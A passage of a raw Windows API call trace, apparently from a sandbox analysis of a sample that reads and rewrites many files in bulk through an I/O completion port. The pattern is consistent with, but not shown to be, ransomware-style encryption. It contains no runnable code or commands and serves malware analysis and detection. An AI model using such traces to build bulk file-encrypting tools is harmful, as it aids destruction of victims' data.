lpOverlapped=0x3bdfad4) returned 1 [0148.011] ReadFile (in: hFile=0x628, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4280020) returned 0x0 [0148.011] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.011] ReadFile (in: hFile=0x61c, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4700020) returned 0x0 [0148.011] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.011] WriteFile (in: hFile=0x644, lpBuffer=0x4a60124*, nNumberOfBytesToWrite=0x890f, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4a60020) returned 1 [0148.019] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0148.019] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4820020) returned 1 [0148.019] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.019] ReadFile (in: hFile=0x618, lpBuffer=0x4940124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4940020) returned 0x0 [0148.019] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.019] ReadFile (in: hFile=0x644, lpBuffer=0x4a60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4a60020) returned 0x0 [0148.019] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.019] WriteFile (in: hFile=0x648, lpBuffer=0x4820094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4820020 | out: lpBuffer=0x4820094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4820020) returned 1 [0148.045] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.045] WriteFile (in: hFile=0x644, lpBuffer=0x4a60094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4a60020) returned 1 [0148.061] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.061] CloseHandle (hObject=0x618) returned 1 [0148.069] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4940020) returned 1 [0148.070] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0148.141] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0148.141] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.159] ReadFile (in: hFile=0x61c, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4280020) returned 0x0 [0148.159] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.164] WriteFile (in: hFile=0x61c, lpBuffer=0x4280094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4280020) returned 1 [0148.170] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.170] CloseHandle (hObject=0x61c) returned 1 [0148.187] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4280020) returned 1 [0148.188] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.188] ReadFile (in: hFile=0x61c, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x2f30020) returned 1 [0148.188] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.189] WriteFile (in: hFile=0x61c, lpBuffer=0x2f30124, nNumberOfBytesToWrite=0x12dc7, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x2f30020) returned 0x0 [0148.252] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.253] ReadFile (in: hFile=0x648, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4280020) returned 1 [0148.400] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.400] ReadFile (in: hFile=0x61c, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0148.400] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.400] ReadFile (in: hFile=0x618, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4700020) returned 1 [0148.400] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.401] ReadFile (in: hFile=0x644, lpBuffer=0x4820124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4820020) returned 1 [0148.495] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.496] ReadFile (in: hFile=0x628, lpBuffer=0x4940124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4940020) returned 1 [0148.590] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.590] ReadFile (in: hFile=0x620, lpBuffer=0x4a60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4a60020) returned 1 [0148.635] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.636] WriteFile (in: hFile=0x648, lpBuffer=0x4280124*, nNumberOfBytesToWrite=0x1298f, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4280020) returned 1 [0148.636] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0148.636] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0148.636] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.636] WriteFile (in: hFile=0x618, lpBuffer=0x4700124*, nNumberOfBytesToWrite=0x5e1e, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4700020) returned 1 [0148.637] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.637] ReadFile (in: hFile=0x2e0, lpBuffer=0x4b80124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4b80020 | out: lpBuffer=0x4b80124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4b80020) returned 1 [0148.637] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.637] ReadFile (in: hFile=0xd8, lpBuffer=0x4ca0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4ca0020 | out: lpBuffer=0x4ca0124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4ca0020) returned 1 [0148.638] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.638] ReadFile (in: hFile=0x63c, lpBuffer=0x4dc0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4dc0020 | out: lpBuffer=0x4dc0124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4dc0020) returned 1 [0148.638] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.638] WriteFile (in: hFile=0x644, lpBuffer=0x4820124*, nNumberOfBytesToWrite=0x10550, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4820020) returned 1 [0148.638] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.638] ReadFile (in: hFile=0x134, lpBuffer=0x4ee0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4ee0020 | out: lpBuffer=0x4ee0124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4ee0020) returned 1 [0148.639] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.639] ReadFile (in: hFile=0x658, lpBuffer=0x5000124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x5000020 | out: lpBuffer=0x5000124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x5000020) returned 1 [0148.639] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.639] WriteFile (in: hFile=0x628, lpBuffer=0x4940124*, nNumberOfBytesToWrite=0xffdf, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4940020) returned 1 [0148.639] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.640] WriteFile (in: hFile=0x620, lpBuffer=0x4a60124*, nNumberOfBytesToWrite=0x127a8, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4a60020) returned 1 [0148.640] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.640] ReadFile (in: hFile=0x138, lpBuffer=0x5120124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x5120020 | out: lpBuffer=0x5120124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x5120020) returned 1 [0148.641] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.641] ReadFile (in: hFile=0x648, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4280020) returned 0x0 [0148.641] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.641] WriteFile (in: hFile=0x61c, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x2f30020) returned 1 [0148.641] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.641] ReadFile (in: hFile=0x618, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4700020) returned 0x0 [0148.641] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.641] WriteFile (in: hFile=0x2e0, lpBuffer=0x4b80124*, nNumberOfBytesToWrite=0x14f2d, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4b80020 | out: lpBuffer=0x4b80124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4b80020) returned 1 [0148.642] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.642] WriteFile (in: hFile=0xd8, lpBuffer=0x4ca0124*, nNumberOfBytesToWrite=0x14816, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4ca0020 | out: lpBuffer=0x4ca0124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4ca0020) returned 1 [0148.642] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.642] WriteFile (in: hFile=0x63c, lpBuffer=0x4dc0124*, nNumberOfBytesToWrite=0x3714, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4dc0020 | out: lpBuffer=0x4dc0124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4dc0020) returned 1 [0148.643] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.643] ReadFile (in: hFile=0x644, lpBuffer=0x4820124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4820020) returned 0x0 [0148.643] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.643] WriteFile (in: hFile=0x134, lpBuffer=0x4ee0124*, nNumberOfBytesToWrite=0x808b, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4ee0020 | out: lpBuffer=0x4ee0124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4ee0020) returned 1 [0148.643] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.643] WriteFile (in: hFile=0x658, lpBuffer=0x5000124*, nNumberOfBytesToWrite=0x25cd, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x5000020 | out: lpBuffer=0x5000124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x5000020) returned 1 [0148.643] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.644] ReadFile (in: hFile=0x628, lpBuffer=0x4940124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4940020) returned 0x0 [0148.644] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.644] ReadFile (in: hFile=0x620, lpBuffer=0x4a60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4a60020) returned 0x0 [0148.644] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.644] WriteFile (in: hFile=0x138, lpBuffer=0x5120124*, nNumberOfBytesToWrite=0xd916, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x5120020 | out: lpBuffer=0x5120124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x5120020) returned 1 [0148.644] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0148.644] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0148.644] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.644] CloseHandle (hObject=0x61c) returned 1 [0148.646] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0148.646] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, 